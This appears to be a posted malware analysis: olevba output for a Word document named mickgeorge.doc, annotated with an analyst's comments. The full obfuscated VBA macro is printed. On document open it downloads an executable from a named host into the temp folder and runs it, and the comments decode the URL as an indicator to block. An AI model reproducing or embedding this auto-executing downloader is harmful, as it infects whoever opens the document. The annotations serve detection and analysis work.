dynamoo

Malicious Word macro

Mar 6th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- mickgeorge.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: mickgeorge.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Auto-executing entry point: Word runs AutoOpen when the document is opened
' (olevba lists it under AutoExec below). Its only action is to call
' atqk_x482mp6v, which lives in Module5 and performs the download-and-execute.
Sub autoopen()
' Unqualified call into Module5; no arguments, no return value used.
atqk_x482mp6v
End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module1.bas
  27. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
' String deobfuscation helper used by the other modules: returns the characters
' at odd positions (1, 3, 5, ...) of its argument and discards the rest. Every
' literal and Chr$() sequence passed to it elsewhere in this sample carries a
' junk character between each real character.
'
' The repeated "Dim x / For x = 0 To 0 / If x = 5 Then End / Next x" groups are
' dead code: each loop runs exactly once with x = 0, so the End statement (which
' would terminate execution if reached) never fires. Presumably padding to
' defeat signature matching and bulk the module; nothing reads these variables.
' No Option Explicit is visible in the listing, so the loop counter
' mrdVdHiTjnq is an implicitly declared Variant.
Public Function wUmMnysKtPzKQMYpELM(CLjPtJqwPYMso As String) As String

Dim nwwuzQelPc As Integer
For nwwuzQelPc = 0 To 0
If nwwuzQelPc = 5 Then End
Next nwwuzQelPc
Dim rUkQQqyoTO As Integer
For rUkQQqyoTO = 0 To 0
If rUkQQqyoTO = 5 Then End
Next rUkQQqyoTO
Dim jHzvHYnIwFd As Integer
For jHzvHYnIwFd = 0 To 0
If jHzvHYnIwFd = 5 Then End
Next jHzvHYnIwFd
' Real work starts here: walk positions 1, 3, 5, ... up to Len(input).
For mrdVdHiTjnq = 1 To Len(CLjPtJqwPYMso) Step 2
Dim lvBxJabwy As Integer
For lvBxJabwy = 0 To 0
If lvBxJabwy = 5 Then End
Next lvBxJabwy
Dim DrdEbaB As Integer
For DrdEbaB = 0 To 0
If DrdEbaB = 5 Then End
Next DrdEbaB
Dim luGjCiFYkYOhfBlvBxJabw As Integer
For luGjCiFYkYOhfBlvBxJabw = 0 To 0
If luGjCiFYkYOhfBlvBxJabw = 5 Then End
Next luGjCiFYkYOhfBlvBxJabw

Dim CwOLiEd As Integer
For CwOLiEd = 0 To 0
If CwOLiEd = 5 Then End
Next CwOLiEd
Dim CiFYkY As Integer
For CiFYkY = 0 To 0
If CiFYkY = 5 Then End
Next CiFYkY
Dim jAmrQrCwO As Integer
For jAmrQrCwO = 0 To 0
If jAmrQrCwO = 5 Then End
Next jAmrQrCwO
' The only statement that matters: append the single character at the current
' odd position to the function's return value.
wUmMnysKtPzKQMYpELM = wUmMnysKtPzKQMYpELM & Mid(CLjPtJqwPYMso, mrdVdHiTjnq, 1)
Dim dSVNmPusaOj As Integer
For dSVNmPusaOj = 0 To 0
If dSVNmPusaOj = 5 Then End
Next dSVNmPusaOj
Dim TjbLtvPsKVqDrdEb As Integer
For TjbLtvPsKVqDrdEb = 0 To 0
If TjbLtvPsKVqDrdEb = 5 Then End
Next TjbLtvPsKVqDrdEb
Dim eCgKvq As Integer
For eCgKvq = 0 To 0
If eCgKvq = 5 Then End
Next eCgKvq

Dim lAHJSqlOQxDQ As Integer
For lAHJSqlOQxDQ = 0 To 0
If lAHJSqlOQxDQ = 5 Then End
Next lAHJSqlOQxDQ
Dim aQtPotqBET As Integer
For aQtPotqBET = 0 To 0
If aQtPotqBET = 5 Then End
Next aQtPotqBET
Dim DziwVVw As Integer
For DziwVVw = 0 To 0
If DziwVVw = 5 Then End
Next DziwVVw
' Closes the Step 2 loop over the input; everything below is padding again.
Next
Dim QRGbRI As Integer
For QRGbRI = 0 To 0
If QRGbRI = 5 Then End
Next QRGbRI
Dim YosvmLbSDlnI As Integer
For YosvmLbSDlnI = 0 To 0
If YosvmLbSDlnI = 5 Then End
Next YosvmLbSDlnI
Dim ETpqzJEix As Integer
For ETpqzJEix = 0 To 0
If ETpqzJEix = 5 Then End
Next ETpqzJEix

Dim MIUlAHJSql As Integer
For MIUlAHJSql = 0 To 0
If MIUlAHJSql = 5 Then End
Next MIUlAHJSql
Dim JgEwsEU As Integer
For JgEwsEU = 0 To 0
If JgEwsEU = 5 Then End
Next JgEwsEU
Dim SklGHRpVzP As Integer
For SklGHRpVzP = 0 To 0
If SklGHRpVzP = 5 Then End
Next SklGHRpVzP
End Function
  123.  
  124.  
  125.  
  126. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  127. ANALYSIS:
  128. No suspicious keyword or IOC found.
  129. -------------------------------------------------------------------------------
  130. VBA MACRO Module2.bas
  131. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module2'
  132. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Module2: sixteen empty procedures with random names. Nothing in this listing
' calls any of them; presumably filler to inflate the module and vary the
' file's hash between builds. Safe to ignore during analysis.
Public Function CBGrxFVwvLB()

End Function
Private Sub ydbIxRHyMQFFstTpRlPo()

End Sub
Private Sub DxPMkTekgsI()

End Sub
Public Sub qNvYoU()

End Sub
Private Sub rYSSRQHAHmM()

End Sub
Public Function UMlOtdZNiZPdnV()

End Function
Public Sub QtFTBSEIj()

End Sub
Private Function geAVuAwILavxG()

End Function
Public Function EQrKEuajinYQYCPfildBQJuceybg()

End Function
Private Sub maLnJIkRjUZzalf()

End Sub
Private Function mLDzKcrMAJhcFH()

End Function
Public Sub VKqzAyDbhoSgfzBtSiaKsu()

End Sub
Private Function ifNbAAckxZtYwN()

End Function
Private Function TmUrb()

End Function
Public Function zQgnpyVQ()

End Function
Public Function jCKzf()

End Function
  181. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  182. ANALYSIS:
  183. No suspicious keyword or IOC found.
  184. -------------------------------------------------------------------------------
  185. VBA MACRO dfsdfsdffdgdhbvdfe3.bas
  186. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/dfsdfsdffdgdhbvdfe3'
  187. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' API import for the download stage: urlmon!URLDownloadToFileA bound to a
' non-ASCII alias so the API name does not appear as an identifier in the
' module text (olevba still catches it via the Alias string, see the
' analysis table below). The two branches give a 64-bit-safe (PtrSafe /
' LongPtr) and a legacy declaration; the parameter names are meaningless.
' Parameter order follows URLDownloadToFileA: caller, URL, destination file
' name, reserved, status callback. A document macro declaring this import
' is itself a high-signal indicator regardless of what else the macro does.
#If VBA7 Then
    ' VBA7 / 64-bit-capable declaration.
    Private Declare PtrSafe Function àðàâàûâà Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As LongPtr, _
    ByVal UYG78t78GIUsfg As String, _
    ByVal UYG78t78GIUsfgf As String, _
    ByVal UYG78t78GIUsfgfd As Long, _
    ByVal UYG78t78GIUsfgfds As LongPtr) As LongPtr
#Else
    ' Pre-VBA7 declaration, 32-bit pointers as Long.
    Private Declare Function àðàâàûâà Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As Long, _
    ByVal UYG78t78GIUsfg As String, _
    ByVal UYG78t78GIUsfgf As String, _
    ByVal UYG78t78GIUsfgfd As Long, _
    ByVal UYG78t78GIUsfgfds As Long) As Long
#End If
  203.  
' Download-and-execute stage, called once from Module5.atqk_x482mp6v.
'   z0ktwRXRQZl2qo0_  URL to fetch (arrives already decoded by the caller)
'   âàûâàûâïóê        local file path to write the download to
' Declared As Boolean but never assigns its return value, so it always
' returns False; the caller does not use it anyway.
Function îãøïãøùèäàâ(z0ktwRXRQZl2qo0_ As String, âàûâàûâïóê As String) As Boolean
' URLDownloadToFileA(NULL, url, path, 0, NULL) through the aliased Declare
' in this module. The HRESULT lands in an undeclared Variant and is never
' checked, so the Open below runs even when the download failed.
vJHKBJdfkgfg = àðàâàûâà(0&, z0ktwRXRQZl2qo0_, âàûâàûâïóê, 0&, 0&)
' Chr$() sequence 83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110
' decodes to "Shell.Application"; CreateObject on it yields a shell object.
Set âûïàâïàâóöà = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
' Shell.Application.Open on the dropped file. Both Chr$() sequences go through
' wUmMnysKtPzKQMYpELM (keep every second character): the first decodes to
' "TMP", the second to "\324235235.exe", so the target is
' Environ("TMP") & "\324235235.exe" - the same path the caller passes as the
' download destination. This is the payload launch; on an instrumented host it
' presumably shows up as Word spawning an executable out of %TMP%, which is
' the behaviour to alert on.
âûïàâïàâóöà.Open Environ(wUmMnysKtPzKQMYpELM(Chr$(84) & Chr$(57) & Chr$(77) & Chr$(104) & Chr$(80) & Chr$(38))) & wUmMnysKtPzKQMYpELM(Chr$(92) & Chr$(61) & Chr$(51) & Chr$(39) & Chr$(50) & Chr$(134) & Chr$(52) & Chr$(122) & Chr$(50) & Chr$(57) & Chr$(51) & Chr$(51) & Chr$(53) & Chr$(95) & Chr$(50) & Chr$(64) & Chr$(51) & Chr$(84) & Chr$(53) & Chr$(96) & Chr$(46) & Chr$(88) & Chr$(101) & Chr$(111) & Chr$(120) & Chr$(44) & Chr$(101) & Chr$(45))
End Function
  209.  
  210.  
  211.  
  212.  
  213.  
  214.  
  215.  
  216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  217. ANALYSIS:
  218. +------------+--------------------+-----------------------------------------+
  219. | Type       | Keyword            | Description                             |
  220. +------------+--------------------+-----------------------------------------+
  221. | Suspicious | CreateObject       | May create an OLE object                |
  222. | Suspicious | Lib                | May run code from a DLL                 |
  223. | Suspicious | Open               | May open a file                         |
  224. | Suspicious | Environ            | May read system environment variables   |
  225. | Suspicious | Chr                | May attempt to obfuscate specific       |
  226. |            |                    | strings                                 |
  227. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  228. +------------+--------------------+-----------------------------------------+
  229. -------------------------------------------------------------------------------
  230. VBA MACRO Class1.cls
  231. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class1'
  232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  233.  
' Class1: twelve empty procedures with random names; nothing in this listing
' references them. Presumably filler, same pattern as Module2.
Private Function vzBtSi()

End Function
Public Sub uOrwJGpC()

End Sub
Private Sub LZAUzYpPqBv()

End Sub
Public Function DNTPcsHOQaxsVY()

End Function
Private Function mbGCC()

End Function
Public Sub xFVwvLBE()

End Sub
Public Function dbIxRHyMQF()

End Function
Private Sub TdpRlPoGR()

End Sub
Private Sub PMkTekgsIJ()

End Sub
Private Function NvYoUbuCYSSRQHAH()

End Function
Private Sub ORUMlOtdZN()

End Sub
Private Sub dnVVJvQtFTBSE()

End Sub
  270. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  271. ANALYSIS:
  272. No suspicious keyword or IOC found.
  273. -------------------------------------------------------------------------------
  274. VBA MACRO Module3.bas
  275. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module3'
  276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  277. (empty macro)
  278. -------------------------------------------------------------------------------
  279. VBA MACRO Module4.bas
  280. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module4'
  281. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Module4: eleven empty procedures with random names, unreferenced anywhere
' in this listing. Presumably filler; no analysis value.
Public Function NiZPdnVVJvQtFTB()

End Function
Private Sub jQTNgeAVuAwI()

End Sub
Private Function xGQLpEQrK()

End Function
Private Function jkinY()

End Function
Private Sub POfildBQJuc()

End Sub
Public Function gtDZmLnJIk()

End Function
Public Sub ZzalfxuQmLDzKcr()

End Sub
Private Sub hcFHoHNVKqzA()

End Sub
Public Function hoSgf()

End Function
Public Function tSiaKsuOrwGpCccDLZAUzY()

End Function
Private Function BvNwTDNT()

End Function
  315. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  316. ANALYSIS:
  317. No suspicious keyword or IOC found.
  318. -------------------------------------------------------------------------------
  319. VBA MACRO Module5.bas
  320. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module5'
  321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Second link in the AutoOpen chain (ThisDocument.autoopen calls this).
' Both arguments to the downloader are deobfuscated by wUmMnysKtPzKQMYpELM
' (keep every second character of the literal):
'   arg 1  "hltEt<p=::/C/..."  ->  http://schlaghaufer.de/js/bin.exe
'          (download URL - the IoC to block/hunt; decoded from the literal,
'          re-run the helper to confirm)
'   arg 2  Environ("TMP") & "\324235235.exe"
'          (drop path; the same path the downloader later opens)
' olevba's table for this module flags only Environ: the download/execute
' keywords sit in the called function and the URL never appears in clear text,
' so decode-then-scan is needed to see the full chain from here.
Sub atqk_x482mp6v()
îãøïãøùèäàâ wUmMnysKtPzKQMYpELM("hltEt<p=::/C/'s4cAhal1a/gNh;a@u0f`e4ro.kdHe2/ZjGs5/PbdiCnB.*e*x^eo"), Environ(wUmMnysKtPzKQMYpELM("T9MhP&")) & wUmMnysKtPzKQMYpELM("\=3'2†4z29335_2@3T5`.Xeox,e-")
End Sub
  325.  
' Module5 filler: fifteen empty procedures with random names that nothing
' calls. Only atqk_x482mp6v above is live in this module.
Public Function ILavxGQLp()

End Function
Private Sub KEuajkin()

End Sub
Private Sub CPOfildBQJuceyb()

End Sub
Private Sub ZmaLnJIkRjU()

End Sub
Private Sub lfxuQ()

End Sub
Private Function zKcrMAJhcFH()

End Function
Public Function VKqzAyDbhoSgf()

End Function
Public Function tSiaKsuOrw()

End Function
Private Function CccDLZAU()

End Function
Private Function PqBvNwTD()

End Function
Public Sub csHOQaxsVYEKe()

End Sub
Public Function CCBGrxFVwvLB()

End Function
Public Sub ydbIxRHyMQFFstT()

End Sub
Public Function lPoGRGDxPMkTek()

End Function
Private Function JfhqNvYoUbuC()

End Function
  371. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  372. ANALYSIS:
  373. +------------+---------+---------------------------------------+
  374. | Type       | Keyword | Description                           |
  375. +------------+---------+---------------------------------------+
  376. | Suspicious | Environ | May read system environment variables |
  377. +------------+---------+---------------------------------------+
  378. -------------------------------------------------------------------------------
  379. VBA MACRO Class2.cls
  380. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class2'
  381. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  382.  
' Class2: sixteen empty procedures with random names; none are referenced in
' this listing. Presumably filler, as in the other padding modules.
Public Function EQrKEuajinYQYCP()

End Function
Public Function ldBQJu()

End Function
Public Function bgtDZmaLnJ()

End Function
Public Sub jUZzalfxuQmLDz()

End Sub
Private Sub MAJhcFHo()

End Sub
Private Function KqzAyDbhoSgfvzB()

End Function
Public Sub aKsuOr()

End Sub
Private Function pCccDLZAUzYp()

End Function
Public Function vNwTDNTPcs()

End Function
Private Sub axsVYEKembGCCB()

End Sub
Private Function FVwvLBEwUy()

End Function
Private Function xRHyMQFFstTd()

End Function
Public Function PoGRGDx()

End Function
Private Sub TekgsIJ()

End Sub
Private Function NvYoUbuCYSSRQHAHMyORUMl()

End Function
Public Sub ZNiZPnVVJv()

End Sub
  431. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  432. ANALYSIS:
  433. No suspicious keyword or IOC found.
  434. -------------------------------------------------------------------------------
  435. VBA MACRO Class3.cls
  436. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class3'
  437. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  438.  
' Class3: fourteen empty procedures with random names, unreferenced in this
' listing. Presumably filler; nothing here executes.
Private Function QFFstTdpRlPoG()

End Function
Private Sub xPMkTekgsIJ()

End Sub
Private Function NvYoUbuC()

End Function
Private Function SRQHAHmMyORUMl()

End Function
Private Function ZNiZP()

End Function
Public Function VJvQtFTBSEIjQTN()

End Function
Private Function VuAwILavxG()

End Function
Private Sub EQrKEuaj()

End Sub
Private Sub YQYCPOf()

End Sub
Private Sub BQJuc()

End Sub
Public Sub gtDZm()

End Sub
Public Sub JIkRjUZ()

End Sub
Private Function fxuQmLD()

End Function
Private Function rMAJh()

End Function
  481. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  482. ANALYSIS:
  483. No suspicious keyword or IOC found.